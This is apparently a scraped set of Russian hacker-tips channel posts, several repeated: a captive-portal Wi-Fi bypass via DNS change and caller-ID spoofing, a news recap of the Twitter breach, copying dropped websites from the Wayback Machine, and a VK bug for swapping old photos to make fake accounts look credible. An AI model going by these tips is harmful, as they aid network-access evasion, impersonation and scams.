Проверяем работают ли приложения, WhatsApp, Skype, Telegram или другие приложения.
Если все работает, то авторизацию в браузере можно обойти, для этого потребуется заменить DNS точки.
Переходим в настройки Wi-Fi, находим нужную сеть, нажимаем и удерживаем.
В выпадающем списке выбираем «Изменить сеть», листаем в самый низ и ставим чекбокс «дополнительно».
В пункте «Настройки IPv4» меняем DHCP на «пользовательские».
Меняем DNS 1 и DNS 2 на "8.8.8.8" и "8.8.4.4".
Нажимаем «Сохранить».
2️⃣
Используем бесплатные виртуальные номера > https://onlinesim.ru/
3️⃣
Пользуемся программами для подмены номера. Данный способ необходим только в том случаи, если для авторизации необходимо совершить звонок.
👍1
⚡️Хакеры взломавшие Twitter публично признались в содеянном
Вот и развязка трагичного проникновения в Twitter. По данным газеты New York Times, за недавней атакой на Twitter стояли хакеры из США и Великобритании, а руководил взломом некто под ником Kirk, который утверждает, что работает в самой соцсети.
По словам участников событий, общение между хакерами велось в мессенджере Discord, который часто используют для связи любители онлайн-игр. Участники взлома познакомились незадолго до операции. В центре всей схемы стоял пользователь под ником Kirk, который является сотрудником соцсети, именно он выводил средства с кошелька, куда мошенники просили переводить биткоины.
Непосредственным взломом аккаунтов звезд также занимался Kirk, который через некоторое время после завершения операции перестал отвечать своим сообщникам. У него был доступ в корпоративный мессенджер сотрудников twitter, что позволило ему проникнуть в сервера компании.
Почему хакеры сливают эту информацию в СМИ? Дело в том, что Kirk предложил им продавать аккаунты twitter с короткими именами (@dark, @w, @l), но
не захватывать аккаунт бывшего президента США и т.д.
P.S Разговор между Кирком и его подельником о продаже аккаунтов Твиттера👇
Вот и развязка трагичного проникновения в Twitter. По данным газеты New York Times, за недавней атакой на Twitter стояли хакеры из США и Великобритании, а руководил взломом некто под ником Kirk, который утверждает, что работает в самой соцсети.
По словам участников событий, общение между хакерами велось в мессенджере Discord, который часто используют для связи любители онлайн-игр. Участники взлома познакомились незадолго до операции. В центре всей схемы стоял пользователь под ником Kirk, который является сотрудником соцсети, именно он выводил средства с кошелька, куда мошенники просили переводить биткоины.
Непосредственным взломом аккаунтов звезд также занимался Kirk, который через некоторое время после завершения операции перестал отвечать своим сообщникам. У него был доступ в корпоративный мессенджер сотрудников twitter, что позволило ему проникнуть в сервера компании.
Почему хакеры сливают эту информацию в СМИ? Дело в том, что Kirk предложил им продавать аккаунты twitter с короткими именами (@dark, @w, @l), но
не захватывать аккаунт бывшего президента США и т.д.
P.S Разговор между Кирком и его подельником о продаже аккаунтов Твиттера👇
👍1
Находим тонны забытой информации
Приветствую читателей Cmd
Каждый день из индекса выпадает сотни тысяч сайтов. Представляете сколько информации можно найти на закрывшихся ресурсах?
Материал, авторские публикации, дизайн, и многое интересное. Всю эту забытую информацию можно применять в абсолютно разных целях.
Чтобы отыскать закрытые сайты нужно воспользоваться сервисом mydrop.io. Данный сайт сохраняет сайты у себя для продажи архивов и доменов.
Регистрируемся там > открываем на главной странице фильтр (ссылка "Показать фильтр") > Выбираем настройки фильтра.
Настройки которые я написал ниже позволяют нам отфильтровать мусорные сайты однодневки и оставить самые приличные. Но вы можете экспериментировать и создавать свои настройки.
1. Зона - ru
2. Cтатус - свободные
3. Кол-во HTML файлов - от 50 до 999 ( так мы уберем киносайты, форумы и тд)
4. Язык - ваш
5.% поискового - от 50
Далее выбираем сайт, который нужен нам и идем на https://web.archive.org/
Вводим линк, выбираем дату и пользуемся закрытым ресурсом.
Если вы захотите полностью скачать закрытый сайт (ну, украсть, как художник), то держите утилиту
которая вам в этом поможет :https://github.com/hartator/wayback-machine-downloader
Все эти сайты закрываются по разным причинам и пропадают в интернет-паутине навсегда.
Глупо не пользоваться таким складом.
Приветствую читателей Cmd
Каждый день из индекса выпадает сотни тысяч сайтов. Представляете сколько информации можно найти на закрывшихся ресурсах?
Материал, авторские публикации, дизайн, и многое интересное. Всю эту забытую информацию можно применять в абсолютно разных целях.
Чтобы отыскать закрытые сайты нужно воспользоваться сервисом mydrop.io. Данный сайт сохраняет сайты у себя для продажи архивов и доменов.
Регистрируемся там > открываем на главной странице фильтр (ссылка "Показать фильтр") > Выбираем настройки фильтра.
Настройки которые я написал ниже позволяют нам отфильтровать мусорные сайты однодневки и оставить самые приличные. Но вы можете экспериментировать и создавать свои настройки.
1. Зона - ru
2. Cтатус - свободные
3. Кол-во HTML файлов - от 50 до 999 ( так мы уберем киносайты, форумы и тд)
4. Язык - ваш
5.% поискового - от 50
Далее выбираем сайт, который нужен нам и идем на https://web.archive.org/
Вводим линк, выбираем дату и пользуемся закрытым ресурсом.
Если вы захотите полностью скачать закрытый сайт (ну, украсть, как художник), то держите утилиту
которая вам в этом поможет :https://github.com/hartator/wayback-machine-downloader
Все эти сайты закрываются по разным причинам и пропадают в интернет-паутине навсегда.
Глупо не пользоваться таким складом.
Делаем подмену фотографии в социальной сети Вконтакте
В данном сервисе очень давно существует баг, который позволяет заменить любую фотографию на странице, при этом дата публикации, лайки и комментарии останутся.
Например, возьмем фотографию, которая была загружена 2 года назад. С помощью бага заменим на новую, но дата публикации будет двух летний давности.
Этим багом часто пользуются мошенники для заполнения профиля. Ведь согласитесь, данный способ делает даже фейк аккаунт очень правдоподобным.
1. Скачиваем расширение VkOpt
2. Выбираем фотографию, которую хотим заменить > нажимаем "Еще" > "Фоторедактор"
У нас открывается окошко.
Проматываем вниз, у нас в углу будет скрытая кнопочка Update. Кликаем.
3. Нажимаем Обзор Далее выбираем новую фотографию и происходит замена.
ВАЖНО! Размеры фотографий должны быть одинаковы! То есть, фотография, которую вы хотите заменить имеет размер 1600x800.
Значит вам необходимо подогнать размер новой фотографии под этот в фоторедакторе.
У кого не появилась кнопка обзор:
1. Отправляете репостом фото, которое хотите заменить любому человека или на другой акк.
2. Открываете фото из сообщений, и кнопка обзор появится.
В данном сервисе очень давно существует баг, который позволяет заменить любую фотографию на странице, при этом дата публикации, лайки и комментарии останутся.
Например, возьмем фотографию, которая была загружена 2 года назад. С помощью бага заменим на новую, но дата публикации будет двух летний давности.
Этим багом часто пользуются мошенники для заполнения профиля. Ведь согласитесь, данный способ делает даже фейк аккаунт очень правдоподобным.
1. Скачиваем расширение VkOpt
2. Выбираем фотографию, которую хотим заменить > нажимаем "Еще" > "Фоторедактор"
У нас открывается окошко.
Проматываем вниз, у нас в углу будет скрытая кнопочка Update. Кликаем.
3. Нажимаем Обзор Далее выбираем новую фотографию и происходит замена.
ВАЖНО! Размеры фотографий должны быть одинаковы! То есть, фотография, которую вы хотите заменить имеет размер 1600x800.
Значит вам необходимо подогнать размер новой фотографии под этот в фоторедакторе.
У кого не появилась кнопка обзор:
1. Отправляете репостом фото, которое хотите заменить любому человека или на другой акк.
2. Открываете фото из сообщений, и кнопка обзор появится.